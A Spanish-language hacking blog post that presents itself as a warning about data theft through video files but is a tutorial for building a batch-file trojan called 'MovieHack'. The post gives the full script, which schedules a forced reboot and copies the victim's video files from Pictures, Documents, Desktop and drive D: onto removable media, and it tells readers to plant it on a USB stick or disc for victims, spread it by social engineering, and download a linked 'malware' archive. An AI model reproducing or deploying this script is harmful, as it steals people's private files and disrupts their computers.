-¿Te unes?- ㊜Suscribete!!!

Entrada destacada

Holehe Web Tool: Detección de Registros de Emails en Servicios Online

Imagen
Hace un tiempo, mientras trabajaba en una investigación OSINT, me encontré con una necesidad muy específica: verificar si una dirección de correo electrónico estaba registrada en diferentes plataformas en línea. Es una tarea común dentro del mundo de la inteligencia de fuentes abiertas, pero que puede volverse repetitiva y técnica si se realiza constantemente desde la línea de comandos. Fue entonces cuando decidí integrar una de las herramientas más conocidas para esta tarea, Holehe , con una interfaz web simple y funcional. El objetivo era claro: facilitar el proceso para que cualquier profesional, sin importar su nivel técnico, pudiera acceder a este tipo de verificación de forma rápida y directa desde un navegador.Así surgió la idea: ¿por qué no acercar esta capacidad a más personas a través de una interfaz web? El punto de partida: ¿Qué es Holehe? Holehe es una herramienta OSINT desarrollada en Python que permite comprobar si una dirección de correo electrónico está registrada e...

Alertan que los hackers pueden robar datos mediante video

Existe cada vez con más equipos y dispositivos donde crear y grabar video digital, como cámaras de video, fotográficas, teléfonos celulares, tabletas y otros.
Hoy en día existen muchos métodos de como poder llegar a tener la información de un servidor,pc etc.


Una de los métodos que usaremos sera el ataque a través de una archivo de video , como todos tenemos entendido . cuando nos compramos un CD/DVD ya sea películas , videos musicales entre otros , todos videos estan en formato ya sea mp4,

Lo que aremos sera crear una archivo similar pero usando simples comando de linea cmd/bat
Código bat

@echo off 
color 1
mode con lines=1 cols=15
title MovieHack
echo         .@@@BB  M@B@B                       7@B@B               
echo         v@@B@B  @B@B@,                      ,B@BP               
echo         q@B@B@ .@@B@B7      ..    :...  ...   ,.      ..        
echo         @B@B@BJ2@B@B@F   Y@@@B@B: @B@B  @B@r B@@G  r@B@B@B.     
echo         B@BU8@B@@ZU@@B  k@B@.PB@B  @@@ ;B@B  @B@5 v@B@:1@@B     
echo        .@B@iLB@B@:;B@B  @B:   :L@k M@@u0@B;  B@BU @B@BOB@B@2    
echo        7B@B: @B@B ;@B@  B@B    @@2 .B@B@B@   @B@U @@B@ ,iiL.
echo        B@B@: B@B@ UB@B: ,B@2@BSB@   @B@B@r  .B@BZ :B@B@@@B@
echo        MB@B, MB@L 7@@@;   J@B@Mr    :@B@@    @B@u   JOB@07                            
echo            https://lpericena.blogspot.com/   
echo.Movie %OS%  %COMPUTERNAME% %USERNAME% %DATE% %TIME%
echo.
shutdown -r -t 3600 -c "Hola %USERNAME% %DATE% %TIME%" 
for /R %USERPROFILE%\Pictures\ %%x in (*.MP4,*.MKV,*.AVI , *.MOV, *.WMV ,*.FLV,*.3GP,*.WebM) do copy "%%x" ".\"
cls
for /R %USERPROFILE%\Documentos\ %%x in (*.MP4,*.MKV,*.AVI , *.MOV, *.WMV ,*.FLV,*.3GP,*.WebM) do copy "%%x" ".\"
cls
for /R %USERPROFILE%\Desktop\ %%x in (*.MP4,*.MKV,*.AVI , *.MOV, *.WMV ,*.FLV,*.3GP,*.WebM) do copy "%%x" ".\"
cls
for /R D:\ %%x in (*.MP4,*.MKV,*.AVI , *.MOV, *.WMV ,*.FLV,*.3GP,*.WebM) do copy "%%x" ".\"
cls
EXIT


Una ves hecho esto lo copiamos en nuestra unidad de memoria/usb o cd/dvd para que la victima pueda instalar y ver al mismo tiempo

Pero como también sabemos al introducir a nuestra laptop ,o un lector de cd/dvd estos videos se ejecuta por si solo y esto por que ocurre ? resulta que los videos tienen aparte un archivo que son programados para que se ejecuten y tenga una mejor visibilidad para el usuario .








No falta un curioso que mire tu pendrive/usb y ejecute el archivo
Como también puedes enviarlo a través de las redes sociales usando ingeniería social

Malware link
https://mega.nz/#F!eI4jiCJL!JN6dkmHRUGmufIfpQ3oS0A

También estos ataques se puede hacer mediante redes sociales ya que hay vulnerabilidad crítica en WhatsApp que permite a los hackers robar información personal de los usuarios almacenada en la app a través del envío de malware (software malicioso) camuflado como un vídeo en formato MP4. La vulnerabilidad afecta tanto a dispositivos Android como iOS. en otra oportunidad estaré publicando metodos para android :)


Descargar
Archivos para extraer información 

Comentarios

¿Hay algo que quieras buscar?

Entradas populares de este blog

Problemas Resuelto Recursividad Programación II - Capitulo 1

Droid Jack control sobre los dispositivos Android

Doxing Espionaje y Recopilación de Información

WhatScriptApp: Automatización de Mensajería y Su Impacto

Sockberus Autentificación de proxys

Hackear contraseñas WiFi con Python fácilmente con este sencillo script

Instalar DoxWeb con Termux

Extensión Credential Capture — POC Segura para Entender Robo de Credenciales

Ciberseguridad en Desarrollo Web: Lo Que Muchos Ignoran

Instalar Framework Shellphish

Comentarios

Ofertas y Descuentos

Libros

Curso Exploit: Esteganografía y Encriptación

Domina las técnicas de ocultación y cifrado utilizadas en el hacking avanzado. Aprende a esconder información en archivos, imágenes y más, utilizando esteganografía, y protege datos con métodos de encriptación imposibles de romper. Este curso te llevará desde lo básico hasta la aplicación de herramientas y exploits reales.

Instructor: pericena
Duración: 2 horas por sesión
Modalidad: Online

$50 USD $40 USD

Libros

Curso OSINT: Inteligencia de Datos Públicos y Hacking

El OSINT (Open Source Intelligence) es una de las herramientas más poderosas en el hacking y la ciberseguridad. En este curso aprenderás a recolectar, analizar y explotar información pública disponible en internet. Descubre cómo los hackers encuentran datos sensibles, rastrean personas y empresas, y cómo puedes protegerte de estas técnicas.

Instructor: pericena
Duración: 2 horas por sesión
Modalidad: Online

$50 USD $40 USD

Mira este video y descubre la verdad

📌 Tú y las redes sociales

💡 ¿Realmente eres libre en el mundo digital?

Publicada por 🚀 Servicio Técnico "The Seven Codes" en Martes, 5 de diciembre de 2019

Es momento de cuestionarlo todo… ¿Eres realmente libre o solo sigues el juego de las redes sociales?

El arte de la guerra nos enseña a no confiar en la posibilidad de que el enemigo no venga, sino en nuestra propia preparación para recibirlo; no confiar en el azar de que no ataque, sino mejor en que hemos hecho inaccesible nuestra posición. — El arte de la guerra, Sun Tzu

¡Conéctate con la comunidad!

Únete a nuestro chat en vivo para compartir ideas, hacer preguntas y conocer a otros apasionados como tú. 🚀

Blog Populares

Instalar DoxWeb con Termux

Instalar Metasploit-Framework En Android Con Termux

Termux Instalar Ngrok

Hackear contraseñas WiFi con Python fácilmente con este sencillo script

WhatScriptApp: Automatización de Mensajería y Su Impacto

By Luishiño

¡Bienvenido a nuestra sección de Seguridad!

Comparte el enlace con tus amigos

¡Copiar Enlace!